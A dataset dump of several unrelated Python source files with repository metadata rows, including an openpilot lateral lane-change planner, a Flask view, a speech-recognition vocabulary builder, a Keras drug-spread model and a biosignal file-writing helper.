LANE_CHANGE_SPEED_MIN = 30 * CV.MPH_TO_MS
LANE_CHANGE_TIME_MAX = 10.
DESIRES = {
LaneChangeDirection.none: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.none,
},
LaneChangeDirection.left: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeLeft,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeLeft,
},
LaneChangeDirection.right: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeRight,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeRight,
},
}
class LateralPlanner():
def __init__(self, CP, use_lanelines=True, wide_camera=False):
self.use_lanelines = use_lanelines
self.LP = LanePlanner(wide_camera)
self.last_cloudlog_t = 0
self.steer_rate_cost = CP.steerRateCost
self.setup_mpc()
self.solution_invalid_cnt = 0
self.lane_change_state = LaneChangeState.off
self.lane_change_direction = LaneChangeDirection.none
self.lane_change_timer = 0.0
self.lane_change_ll_prob = 1.0
self.keep_pulse_timer = 0.0
self.prev_one_blinker = False
self.desire = log.LateralPlan.Desire.none
self.path_xyz = np.zeros((TRAJECTORY_SIZE,3))
self.path_xyz_stds = np.ones((TRAJECTORY_SIZE,3))
self.plan_yaw = np.zeros((TRAJECTORY_SIZE,))
self.t_idxs = np.arange(TRAJECTORY_SIZE)
self.y_pts = np.zeros(TRAJECTORY_SIZE)
def setup_mpc(self):
self.libmpc = libmpc_py.libmpc
self.libmpc.init()
self.mpc_solution = libmpc_py.ffi.new("log_t *")
self.cur_state = libmpc_py.ffi.new("state_t *")
self.cur_state[0].x = 0.0
self.cur_state[0].y = 0.0
self.cur_state[0].psi = 0.0
self.cur_state[0].curvature = 0.0
self.desired_curvature = 0.0
self.safe_desired_curvature = 0.0
self.desired_curvature_rate = 0.0
self.safe_desired_curvature_rate = 0.0
def update(self, sm, CP):
v_ego = sm['carState'].vEgo
active = sm['controlsState'].active
measured_curvature = sm['controlsState'].curvature
md = sm['modelV2']
self.LP.parse_model(sm['modelV2'])
if len(md.position.x) == TRAJECTORY_SIZE and len(md.orientation.x) == TRAJECTORY_SIZE:
self.path_xyz = np.column_stack([md.position.x, md.position.y, md.position.z])
self.t_idxs = np.array(md.position.t)
self.plan_yaw = list(md.orientation.z)
if len(md.orientation.xStd) == TRAJECTORY_SIZE:
self.path_xyz_stds = np.column_stack([md.position.xStd, md.position.yStd, md.position.zStd])
# Lane change logic
one_blinker = sm['carState'].leftBlinker != sm['carState'].rightBlinker
below_lane_change_speed = v_ego < LANE_CHANGE_SPEED_MIN
if (not active) or (self.lane_change_timer > LANE_CHANGE_TIME_MAX):
self.lane_change_state = LaneChangeState.off
self.lane_change_direction = LaneChangeDirection.none
else:
# LaneChangeState.off
if self.lane_change_state == LaneChangeState.off and one_blinker and not self.prev_one_blinker and not below_lane_change_speed:
self.lane_change_state = LaneChangeState.preLaneChange
self.lane_change_ll_prob = 1.0
# LaneChangeState.preLaneChange
elif self.lane_change_state == LaneChangeState.preLaneChange:
# Set lane change direction
if sm['carState'].leftBlinker:
self.lane_change_direction = LaneChangeDirection.left
elif sm['carState'].rightBlinker:
self.lane_change_direction = LaneChangeDirection.right
else: # If there are no blinkers we will go back to LaneChangeState.off
self.lane_change_direction = LaneChangeDirection.none
torque_applied = sm['carState'].steeringPressed and \
((sm['carState'].steeringTorque > 0 and self.lane_change_direction == LaneChangeDirection.left) or
(sm['carState'].steeringTorque < 0 and self.lane_change_direction == LaneChangeDirection.right))
blindspot_detected = ((sm['carState'].leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or
(sm['carState'].rightBlindspot and self.lane_change_direction == LaneChangeDirection.right))
if not one_blinker or below_lane_change_speed:
self.lane_change_state = LaneChangeState.off
elif torque_applied and not blindspot_detected:
self.lane_change_state = LaneChangeState.laneChangeStarting
# LaneChangeState.laneChangeStarting
elif self.lane_change_state == LaneChangeState.laneChangeStarting:
# fade out over .5s
self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2*DT_MDL, 0.0)
# 98% certainty
lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob
if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01:
self.lane_change_state = LaneChangeState.laneChangeFinishing
# LaneChangeState.laneChangeFinishing
elif self.lane_change_state == LaneChangeState.laneChangeFinishing:
# fade in laneline over 1s
self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0)
if one_blinker and self.lane_change_ll_prob > 0.99:
self.lane_change_state = LaneChangeState.preLaneChange
elif self.lane_change_ll_prob > 0.99:
self.lane_change_state = LaneChangeState.off
if self.lane_change_state in [LaneChangeState.off, LaneChangeState.preLaneChange]:
self.lane_change_timer = 0.0
else:
self.lane_change_timer += DT_MDL
self.prev_one_blinker = one_blinker
self.desire = DESIRES[self.lane_change_direction][self.lane_change_state]
# Send keep pulse once per second during LaneChangeStart.preLaneChange
if self.lane_change_state in [LaneChangeState.off, LaneChangeState.laneChangeStarting]:
self.keep_pulse_timer = 0.0
elif self.lane_change_state == LaneChangeState.preLaneChange:
self.keep_pulse_timer += DT_MDL
if self.keep_pulse_timer > 1.0:
self.keep_pulse_timer = 0.0
elif self.desire in [log.LateralPlan.Desire.keepLeft, log.LateralPlan.Desire.keepRight]:
self.desire = log.LateralPlan.Desire.none
# Turn off lanes during lane change
if self.desire == log.LateralPlan.Desire.laneChangeRight or self.desire == log.LateralPlan.Desire.laneChangeLeft:
self.LP.lll_prob *= self.lane_change_ll_prob
self.LP.rll_prob *= self.lane_change_ll_prob
if self.use_lanelines:
d_path_xyz = self.LP.get_d_path(v_ego, self.t_idxs, self.path_xyz)
self.libmpc.set_weights(MPC_COST_LAT.PATH, MPC_COST_LAT.HEADING, CP.steerRateCost)
else:
d_path_xyz = self.path_xyz
path_cost = np.clip(abs(self.path_xyz[0,1]/self.path_xyz_stds[0,1]), 0.5, 5.0) * MPC_COST_LAT.PATH
# Heading cost is useful at low speed, otherwise end of plan can be off-heading
heading_cost = interp(v_ego, [5.0, 10.0], [MPC_COST_LAT.HEADING, 0.0])
self.libmpc.set_weights(path_cost, heading_cost, CP.steerRateCost)
y_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(d_path_xyz, axis=1), d_path_xyz[:,1])
heading_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.path_xyz, axis=1), self.plan_yaw)
self.y_pts = y_pts
assert len(y_pts) == LAT_MPC_N + 1
assert len(heading_pts) == LAT_MPC_N + 1
# for now CAR_ROTATION_RADIUS is disabled
# to use it, enable it in the MPC
assert abs(CAR_ROTATION_RADIUS) < 1e-3
self.libmpc.run_mpc(self.cur_state, self.mpc_solution,
float(v_ego),
CAR_ROTATION_RADIUS,
list(y_pts),
list(heading_pts))
# init state for next
self.cur_state.x = 0.0
self.cur_state.y = 0.0
self.cur_state.psi = 0.0
self.cur_state.curvature = interp(DT_MDL, self.t_idxs[:LAT_MPC_N + 1], self.mpc_solution.curvature)
# Check for infeasable MPC solution
mpc_nans = any(math.isnan(x) for x in self.mpc_solution.curvature)
t = sec_since_boot()
if mpc_nans:
self.libmpc.init()
self.cur_state.curvature = measured_curvature
if t > self.last_cloudlog_t + 5.0:
self.last_cloudlog_t = t
cloudlog.warning("Lateral mpc - nan: True")
if self.mpc_solution[0].cost > 20000. or mpc_nans: # TODO: find a better way to detect when MPC did not converge
self.solution_invalid_cnt += 1
else:
self.solution_invalid_cnt = 0
def publish(self, sm, pm):
plan_solution_valid = self.solution_invalid_cnt < 2
plan_send = messaging.new_message('lateralPlan')
plan_send.valid = sm.all_alive_and_valid(service_list=['carState', 'controlsState', 'modelV2'])
plan_send.lateralPlan.laneWidth = float(self.LP.lane_width)
plan_send.lateralPlan.dPathPoints = [float(x) for x in self.y_pts]
plan_send.lateralPlan.psis = [float(x) for x in self.mpc_solution.psi[0:CONTROL_N]]
plan_send.lateralPlan.curvatures = [float(x) for x in self.mpc_solution.curvature[0:CONTROL_N]]
plan_send.lateralPlan.curvatureRates = [float(x) for x in self.mpc_solution.curvature_rate[0:CONTROL_N-1]] +[0.0]
plan_send.lateralPlan.lProb = float(self.LP.lll_prob)
plan_send.lateralPlan.rProb = float(self.LP.rll_prob)
plan_send.lateralPlan.dProb = float(self.LP.d_prob)
plan_send.lateralPlan.mpcSolutionValid = bool(plan_solution_valid)
plan_send.lateralPlan.desire = self.desire
plan_send.lateralPlan.laneChangeState = self.lane_change_state
plan_send.lateralPlan.laneChangeDirection = self.lane_change_direction
pm.send('lateralPlan', plan_send)
if LOG_MPC:
dat = messaging.new_message('liveMpc')
dat.liveMpc.x = list(self.mpc_solution.x)
dat.liveMpc.y = list(self.mpc_solution.y)
dat.liveMpc.psi = list(self.mpc_solution.psi)
dat.liveMpc.curvature = list(self.mpc_solution.curvature)
dat.liveMpc.cost = self.mpc_solution.cost
pm.send('liveMpc', dat)
| 44.457831 | 133 | 0.725474 | import os
import math
import numpy as np
from common.realtime import sec_since_boot, DT_MDL
from common.numpy_fast import interp
from selfdrive.swaglog import cloudlog
from selfdrive.controls.lib.lateral_mpc import libmpc_py
from selfdrive.controls.lib.drive_helpers import CONTROL_N, MPC_COST_LAT, LAT_MPC_N, CAR_ROTATION_RADIUS
from selfdrive.controls.lib.lane_planner import LanePlanner, TRAJECTORY_SIZE
from selfdrive.config import Conversions as CV
import cereal.messaging as messaging
from cereal import log
LaneChangeState = log.LateralPlan.LaneChangeState
LaneChangeDirection = log.LateralPlan.LaneChangeDirection
LOG_MPC = os.environ.get('LOG_MPC', False)
LANE_CHANGE_SPEED_MIN = 30 * CV.MPH_TO_MS
LANE_CHANGE_TIME_MAX = 10.
DESIRES = {
LaneChangeDirection.none: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.none,
},
LaneChangeDirection.left: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeLeft,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeLeft,
},
LaneChangeDirection.right: {
LaneChangeState.off: log.LateralPlan.Desire.none,
LaneChangeState.preLaneChange: log.LateralPlan.Desire.none,
LaneChangeState.laneChangeStarting: log.LateralPlan.Desire.laneChangeRight,
LaneChangeState.laneChangeFinishing: log.LateralPlan.Desire.laneChangeRight,
},
}
class LateralPlanner():
def __init__(self, CP, use_lanelines=True, wide_camera=False):
self.use_lanelines = use_lanelines
self.LP = LanePlanner(wide_camera)
self.last_cloudlog_t = 0
self.steer_rate_cost = CP.steerRateCost
self.setup_mpc()
self.solution_invalid_cnt = 0
self.lane_change_state = LaneChangeState.off
self.lane_change_direction = LaneChangeDirection.none
self.lane_change_timer = 0.0
self.lane_change_ll_prob = 1.0
self.keep_pulse_timer = 0.0
self.prev_one_blinker = False
self.desire = log.LateralPlan.Desire.none
self.path_xyz = np.zeros((TRAJECTORY_SIZE,3))
self.path_xyz_stds = np.ones((TRAJECTORY_SIZE,3))
self.plan_yaw = np.zeros((TRAJECTORY_SIZE,))
self.t_idxs = np.arange(TRAJECTORY_SIZE)
self.y_pts = np.zeros(TRAJECTORY_SIZE)
def setup_mpc(self):
self.libmpc = libmpc_py.libmpc
self.libmpc.init()
self.mpc_solution = libmpc_py.ffi.new("log_t *")
self.cur_state = libmpc_py.ffi.new("state_t *")
self.cur_state[0].x = 0.0
self.cur_state[0].y = 0.0
self.cur_state[0].psi = 0.0
self.cur_state[0].curvature = 0.0
self.desired_curvature = 0.0
self.safe_desired_curvature = 0.0
self.desired_curvature_rate = 0.0
self.safe_desired_curvature_rate = 0.0
def update(self, sm, CP):
v_ego = sm['carState'].vEgo
active = sm['controlsState'].active
measured_curvature = sm['controlsState'].curvature
md = sm['modelV2']
self.LP.parse_model(sm['modelV2'])
if len(md.position.x) == TRAJECTORY_SIZE and len(md.orientation.x) == TRAJECTORY_SIZE:
self.path_xyz = np.column_stack([md.position.x, md.position.y, md.position.z])
self.t_idxs = np.array(md.position.t)
self.plan_yaw = list(md.orientation.z)
if len(md.orientation.xStd) == TRAJECTORY_SIZE:
self.path_xyz_stds = np.column_stack([md.position.xStd, md.position.yStd, md.position.zStd])
one_blinker = sm['carState'].leftBlinker != sm['carState'].rightBlinker
below_lane_change_speed = v_ego < LANE_CHANGE_SPEED_MIN
if (not active) or (self.lane_change_timer > LANE_CHANGE_TIME_MAX):
self.lane_change_state = LaneChangeState.off
self.lane_change_direction = LaneChangeDirection.none
else:
if self.lane_change_state == LaneChangeState.off and one_blinker and not self.prev_one_blinker and not below_lane_change_speed:
self.lane_change_state = LaneChangeState.preLaneChange
self.lane_change_ll_prob = 1.0
elif self.lane_change_state == LaneChangeState.preLaneChange:
if sm['carState'].leftBlinker:
self.lane_change_direction = LaneChangeDirection.left
elif sm['carState'].rightBlinker:
self.lane_change_direction = LaneChangeDirection.right
else:
self.lane_change_direction = LaneChangeDirection.none
torque_applied = sm['carState'].steeringPressed and \
((sm['carState'].steeringTorque > 0 and self.lane_change_direction == LaneChangeDirection.left) or
(sm['carState'].steeringTorque < 0 and self.lane_change_direction == LaneChangeDirection.right))
blindspot_detected = ((sm['carState'].leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or
(sm['carState'].rightBlindspot and self.lane_change_direction == LaneChangeDirection.right))
if not one_blinker or below_lane_change_speed:
self.lane_change_state = LaneChangeState.off
elif torque_applied and not blindspot_detected:
self.lane_change_state = LaneChangeState.laneChangeStarting
elif self.lane_change_state == LaneChangeState.laneChangeStarting:
self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2*DT_MDL, 0.0)
lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob
if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01:
self.lane_change_state = LaneChangeState.laneChangeFinishing
elif self.lane_change_state == LaneChangeState.laneChangeFinishing:
self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0)
if one_blinker and self.lane_change_ll_prob > 0.99:
self.lane_change_state = LaneChangeState.preLaneChange
elif self.lane_change_ll_prob > 0.99:
self.lane_change_state = LaneChangeState.off
if self.lane_change_state in [LaneChangeState.off, LaneChangeState.preLaneChange]:
self.lane_change_timer = 0.0
else:
self.lane_change_timer += DT_MDL
self.prev_one_blinker = one_blinker
self.desire = DESIRES[self.lane_change_direction][self.lane_change_state]
if self.lane_change_state in [LaneChangeState.off, LaneChangeState.laneChangeStarting]:
self.keep_pulse_timer = 0.0
elif self.lane_change_state == LaneChangeState.preLaneChange:
self.keep_pulse_timer += DT_MDL
if self.keep_pulse_timer > 1.0:
self.keep_pulse_timer = 0.0
elif self.desire in [log.LateralPlan.Desire.keepLeft, log.LateralPlan.Desire.keepRight]:
self.desire = log.LateralPlan.Desire.none
if self.desire == log.LateralPlan.Desire.laneChangeRight or self.desire == log.LateralPlan.Desire.laneChangeLeft:
self.LP.lll_prob *= self.lane_change_ll_prob
self.LP.rll_prob *= self.lane_change_ll_prob
if self.use_lanelines:
d_path_xyz = self.LP.get_d_path(v_ego, self.t_idxs, self.path_xyz)
self.libmpc.set_weights(MPC_COST_LAT.PATH, MPC_COST_LAT.HEADING, CP.steerRateCost)
else:
d_path_xyz = self.path_xyz
path_cost = np.clip(abs(self.path_xyz[0,1]/self.path_xyz_stds[0,1]), 0.5, 5.0) * MPC_COST_LAT.PATH
heading_cost = interp(v_ego, [5.0, 10.0], [MPC_COST_LAT.HEADING, 0.0])
self.libmpc.set_weights(path_cost, heading_cost, CP.steerRateCost)
y_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(d_path_xyz, axis=1), d_path_xyz[:,1])
heading_pts = np.interp(v_ego * self.t_idxs[:LAT_MPC_N + 1], np.linalg.norm(self.path_xyz, axis=1), self.plan_yaw)
self.y_pts = y_pts
assert len(y_pts) == LAT_MPC_N + 1
assert len(heading_pts) == LAT_MPC_N + 1
assert abs(CAR_ROTATION_RADIUS) < 1e-3
self.libmpc.run_mpc(self.cur_state, self.mpc_solution,
float(v_ego),
CAR_ROTATION_RADIUS,
list(y_pts),
list(heading_pts))
self.cur_state.x = 0.0
self.cur_state.y = 0.0
self.cur_state.psi = 0.0
self.cur_state.curvature = interp(DT_MDL, self.t_idxs[:LAT_MPC_N + 1], self.mpc_solution.curvature)
mpc_nans = any(math.isnan(x) for x in self.mpc_solution.curvature)
t = sec_since_boot()
if mpc_nans:
self.libmpc.init()
self.cur_state.curvature = measured_curvature
if t > self.last_cloudlog_t + 5.0:
self.last_cloudlog_t = t
cloudlog.warning("Lateral mpc - nan: True")
if self.mpc_solution[0].cost > 20000. or mpc_nans:
self.solution_invalid_cnt += 1
else:
self.solution_invalid_cnt = 0
def publish(self, sm, pm):
plan_solution_valid = self.solution_invalid_cnt < 2
plan_send = messaging.new_message('lateralPlan')
plan_send.valid = sm.all_alive_and_valid(service_list=['carState', 'controlsState', 'modelV2'])
plan_send.lateralPlan.laneWidth = float(self.LP.lane_width)
plan_send.lateralPlan.dPathPoints = [float(x) for x in self.y_pts]
plan_send.lateralPlan.psis = [float(x) for x in self.mpc_solution.psi[0:CONTROL_N]]
plan_send.lateralPlan.curvatures = [float(x) for x in self.mpc_solution.curvature[0:CONTROL_N]]
plan_send.lateralPlan.curvatureRates = [float(x) for x in self.mpc_solution.curvature_rate[0:CONTROL_N-1]] +[0.0]
plan_send.lateralPlan.lProb = float(self.LP.lll_prob)
plan_send.lateralPlan.rProb = float(self.LP.rll_prob)
plan_send.lateralPlan.dProb = float(self.LP.d_prob)
plan_send.lateralPlan.mpcSolutionValid = bool(plan_solution_valid)
plan_send.lateralPlan.desire = self.desire
plan_send.lateralPlan.laneChangeState = self.lane_change_state
plan_send.lateralPlan.laneChangeDirection = self.lane_change_direction
pm.send('lateralPlan', plan_send)
if LOG_MPC:
dat = messaging.new_message('liveMpc')
dat.liveMpc.x = list(self.mpc_solution.x)
dat.liveMpc.y = list(self.mpc_solution.y)
dat.liveMpc.psi = list(self.mpc_solution.psi)
dat.liveMpc.curvature = list(self.mpc_solution.curvature)
dat.liveMpc.cost = self.mpc_solution.cost
pm.send('liveMpc', dat)
| true | true |
1c3ca96a8752bea73f340ee28894ea1bdab8af22 | 215 | py | Python | Python 3/19.prac_no2.py | ByeonUi-Hyeok/practice | 6f55ddcb662e2bf8e0c3fb4c4af0beb77a1c7d2d | [
"MIT"
] | 1 | 2021-06-11T08:55:03.000Z | 2021-06-11T08:55:03.000Z | Python 3/19.prac_no2.py | ByeonUi-Hyeok/practice | 6f55ddcb662e2bf8e0c3fb4c4af0beb77a1c7d2d | [
"MIT"
] | null | null | null | Python 3/19.prac_no2.py | ByeonUi-Hyeok/practice | 6f55ddcb662e2bf8e0c3fb4c4af0beb77a1c7d2d | [
"MIT"
] | null | null | null | import funcvote as vote
votes = input("투표내용 >>>")
# print(votes)
# print(type(votes))
result = vote.str2int(votes)
print(vote.countvotes(result))
result = vote.countvotes(result)
vote.printvote(result)
# 투표 초안 | 14.333333 | 32 | 0.716279 | import funcvote as vote
votes = input("투표내용 >>>")
result = vote.str2int(votes)
print(vote.countvotes(result))
result = vote.countvotes(result)
vote.printvote(result)
| true | true |
1c3ca9e71817ee5fcb844a158df98afd6ab0e6c3 | 287 | py | Python | app/main/views/digital_services_framework.py | pebblecode/cirrus-buyer-frontend | 506c45eab09fa9538c0eb05643e24feecdcca56f | [
"MIT"
] | null | null | null | app/main/views/digital_services_framework.py | pebblecode/cirrus-buyer-frontend | 506c45eab09fa9538c0eb05643e24feecdcca56f | [
"MIT"
] | null | null | null | app/main/views/digital_services_framework.py | pebblecode/cirrus-buyer-frontend | 506c45eab09fa9538c0eb05643e24feecdcca56f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from flask import render_template
from ...main import main
@main.route('/digital-services/framework')
def framework_digital_services():
return render_template(
'content/framework-digital-services.html'
)
| 22.076923 | 49 | 0.738676 |
from __future__ import unicode_literals
from flask import render_template
from ...main import main
@main.route('/digital-services/framework')
def framework_digital_services():
return render_template(
'content/framework-digital-services.html'
)
| true | true |
1c3ca9fe0ba39643af17fbe0c380891ae5a61c42 | 723 | py | Python | Audio/OpenTransformer/egs/aishell/local/generate_vocab.py | mls1999725/models | 77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02 | [
"Apache-2.0"
] | 43 | 2021-06-03T09:07:08.000Z | 2022-03-31T15:21:48.000Z | Audio/OpenTransformer/egs/aishell/local/generate_vocab.py | mls1999725/models | 77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02 | [
"Apache-2.0"
] | 64 | 2021-05-31T10:34:06.000Z | 2022-01-17T03:44:58.000Z | Audio/OpenTransformer/egs/aishell/local/generate_vocab.py | mls1999725/models | 77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02 | [
"Apache-2.0"
] | 37 | 2021-07-04T03:13:18.000Z | 2022-03-25T07:30:47.000Z | import os
import sys
text_in = sys.argv[1]
vocab_out = sys.argv[2]
lexicon = {}
with open(text_in, "r", encoding="utf-8") as f:
for line in f:
parts = line.strip().split()
idx = parts[0]
phones = parts[1:]
for p in phones:
if p not in lexicon:
lexicon[p] = 1
else:
lexicon[p] += 1
print("There are %d label in lexicon!" % len(lexicon))
vocab = sorted(lexicon.items(), key=lambda x: x[1], reverse=True)
index = 3
with open(vocab_out, "w") as w:
w.write("<PAD> 0\n")
w.write("<S/E> 1\n")
w.write("<UNK> 2\n")
for (l, n) in vocab:
w.write(l + " " + str(index) + "\n")
index += 1
print("Done!")
| 20.657143 | 65 | 0.514523 | import os
import sys
text_in = sys.argv[1]
vocab_out = sys.argv[2]
lexicon = {}
with open(text_in, "r", encoding="utf-8") as f:
for line in f:
parts = line.strip().split()
idx = parts[0]
phones = parts[1:]
for p in phones:
if p not in lexicon:
lexicon[p] = 1
else:
lexicon[p] += 1
print("There are %d label in lexicon!" % len(lexicon))
vocab = sorted(lexicon.items(), key=lambda x: x[1], reverse=True)
index = 3
with open(vocab_out, "w") as w:
w.write("<PAD> 0\n")
w.write("<S/E> 1\n")
w.write("<UNK> 2\n")
for (l, n) in vocab:
w.write(l + " " + str(index) + "\n")
index += 1
print("Done!")
| true | true |
1c3caa05b79ab822072c9a3ba8a1575fcab9bfd3 | 2,212 | py | Python | solution/model2.py | LoveThinkinghard/MCM-2019-Problem-C-drug-spread-maps | 2fe2a6eaaa6c5fdbeab972ffd82a71b60259737e | [
"MIT"
] | 14 | 2019-03-16T02:18:13.000Z | 2022-01-28T14:31:11.000Z | solution/model2.py | LoveThinkinghard/MCM-2019-Problem-C-Solution | 2fe2a6eaaa6c5fdbeab972ffd82a71b60259737e | [
"MIT"
] | 1 | 2019-01-28T14:48:19.000Z | 2019-01-28T14:48:19.000Z | solution/model2.py | LoveThinkinghard/MCM-2019-Problem-C-drug-spread-maps | 2fe2a6eaaa6c5fdbeab972ffd82a71b60259737e | [
"MIT"
] | 2 | 2019-12-20T12:38:44.000Z | 2020-01-16T08:18:54.000Z | # -*- coding: utf-8 -*-
# if you run 'model1.py' just now, you need to restart your kernel.
# or you might have some trouble when you fit the model
import keras.layers as kl
from keras import Model
import numpy as np
import matplotlib.pyplot as plt
#%%
dis_mat = np.load('./data/distance_matrix.npy')
drug_use = np.load('./data/drug_use.npy')
all_s_use = np.load('./data/all_s_use.npy')
# this eco_data comes from socio-economic data, which is difficult to pre-process
# and actually, we made some mistakes on this thing
# which means that the data below is wrong, but can be used
# if you want to, you can try it yourself
x_eco_data = np.load('./data/eco_data.npy')
#%%
X = []
Y = []
for i in range(7):
for n in range(28):
if all_s_use[n, i].sum()>0:
X.append(list([np.matmul(all_s_use[n, i], dis_mat)])+list(x_eco_data[i]))
Y.append(all_s_use[n, i+1])
X3 = []
for i in range(462):
X3.append([X[n][i] for n in range(123)])
#%%
counties_input = kl.Input(shape=(461,))
eco_inputs = []
eco_mat = []
shared_dense = kl.Dense(1)
for i in range(461):
eco_inputs.append(kl.Input(shape=(197,)))
eco_mat.append(shared_dense(eco_inputs[-1]))
eco_mat = kl.concatenate(eco_mat)
hide_input = kl.multiply([counties_input, eco_mat])
output = kl.Dense(461)(hide_input)
model = Model([counties_input]+eco_inputs, output)
model.compile(optimizer='adam', loss='mean_squared_error')
model.summary()
#%%
# it takes several minutes, and you will not go faster even you use 1080ti, I tried
# it might because we use a shared Dense layer for 461 inputs
history = model.fit(x=X3, y=[Y], batch_size=4, epochs=200)
#%%
plt.plot(history.epoch, history.history['loss'])
#%%
eco_weight = model.get_weights()[0]
plt.plot(range(eco_weight.size), eco_weight)
#%%
# head are tags of socio-economic data in a certain order
# this just where we do wrong, because different tags are used in each file.
head = np.load('./data/head.npy')
order = eco_weight.argsort(axis=0)
one_node = model.get_weights()[1]
print(head[order])
print('this list is in a increase order')
if one_node>0:
print('larger the parameter, more the drug use')
else:
print('larger the parameter, less the drug use')
| 32.529412 | 85 | 0.701175 |
import keras.layers as kl
from keras import Model
import numpy as np
import matplotlib.pyplot as plt
dis_mat = np.load('./data/distance_matrix.npy')
drug_use = np.load('./data/drug_use.npy')
all_s_use = np.load('./data/all_s_use.npy')
x_eco_data = np.load('./data/eco_data.npy')
X = []
Y = []
for i in range(7):
for n in range(28):
if all_s_use[n, i].sum()>0:
X.append(list([np.matmul(all_s_use[n, i], dis_mat)])+list(x_eco_data[i]))
Y.append(all_s_use[n, i+1])
X3 = []
for i in range(462):
X3.append([X[n][i] for n in range(123)])
counties_input = kl.Input(shape=(461,))
eco_inputs = []
eco_mat = []
shared_dense = kl.Dense(1)
for i in range(461):
eco_inputs.append(kl.Input(shape=(197,)))
eco_mat.append(shared_dense(eco_inputs[-1]))
eco_mat = kl.concatenate(eco_mat)
hide_input = kl.multiply([counties_input, eco_mat])
output = kl.Dense(461)(hide_input)
model = Model([counties_input]+eco_inputs, output)
model.compile(optimizer='adam', loss='mean_squared_error')
model.summary()
history = model.fit(x=X3, y=[Y], batch_size=4, epochs=200)
plt.plot(history.epoch, history.history['loss'])
eco_weight = model.get_weights()[0]
plt.plot(range(eco_weight.size), eco_weight)
head = np.load('./data/head.npy')
order = eco_weight.argsort(axis=0)
one_node = model.get_weights()[1]
print(head[order])
print('this list is in a increase order')
if one_node>0:
print('larger the parameter, more the drug use')
else:
print('larger the parameter, less the drug use')
| true | true |
1c3caa2c1dee461acb382207574a2741ec964c98 | 1,249 | py | Python | epibox/common/write_file.py | PIA-Group/epibox | 9b12ae27e73c69845d2418b2a2ba00c10e2c99f5 | [
"MIT"
] | null | null | null | epibox/common/write_file.py | PIA-Group/epibox | 9b12ae27e73c69845d2418b2a2ba00c10e2c99f5 | [
"MIT"
] | null | null | null | epibox/common/write_file.py | PIA-Group/epibox | 9b12ae27e73c69845d2418b2a2ba00c10e2c99f5 | [
"MIT"
] | null | null | null | # built-in
from datetime import datetime
import os
# third-party
import numpy as np
def write_file(t, a_file, sync_param, time, fmt):
write_acq_file(a_file, t, time, fmt)
def write_acq_file(a_file, t, time, fmt):
np.savetxt(a_file, t, fmt=fmt, delimiter=' ', newline='\n', header='', footer='', comments ='')
def write_drift_log(filename, sync_param):
sync_time = sync_param['sync_time']
if not sync_param['mode']:
filename.write('%s' % sync_time + '\n')
sync_param['mode'] = 1
else:
filename.write('\n')
print('%s' % ' ' + sync_time)
def write_annot_file(recording_name, annot):
with open(os.path.join(os.path.split(recording_name)[0], 'annotations' + '.txt'), 'a+') as file:
file.write(f'{os.path.split(recording_name)[1]} {annot[0]} {annot[1]} {datetime.now()}\n')
def write_summary_file(recording_name):
duration = datetime.now() - datetime.strptime(os.path.split(recording_name)[1][1:-4], '%Y-%m-%d %H-%M-%S')
print(f'duration: {str(duration)}')
with open(os.path.join(os.path.split(recording_name)[0], 'summary' + '.txt'), 'a+') as file:
file.write('{} {}\n'.format(os.path.split(recording_name)[1], str(duration).split('.')[0])) | 29.046512 | 110 | 0.630905 |
from datetime import datetime
import os
import numpy as np
def write_file(t, a_file, sync_param, time, fmt):
write_acq_file(a_file, t, time, fmt)
def write_acq_file(a_file, t, time, fmt):
np.savetxt(a_file, t, fmt=fmt, delimiter=' ', newline='\n', header='', footer='', comments ='')
def write_drift_log(filename, sync_param):
sync_time = sync_param['sync_time']
if not sync_param['mode']:
filename.write('%s' % sync_time + '\n')
sync_param['mode'] = 1
else:
filename.write('\n')
print('%s' % ' ' + sync_time)
def write_annot_file(recording_name, annot):
with open(os.path.join(os.path.split(recording_name)[0], 'annotations' + '.txt'), 'a+') as file:
file.write(f'{os.path.split(recording_name)[1]} {annot[0]} {annot[1]} {datetime.now()}\n')
def write_summary_file(recording_name):
duration = datetime.now() - datetime.strptime(os.path.split(recording_name)[1][1:-4], '%Y-%m-%d %H-%M-%S')
print(f'duration: {str(duration)}')
with open(os.path.join(os.path.split(recording_name)[0], 'summary' + '.txt'), 'a+') as file:
file.write('{} {}\n'.format(os.path.split(recording_name)[1], str(duration).split('.')[0])) | true | true |
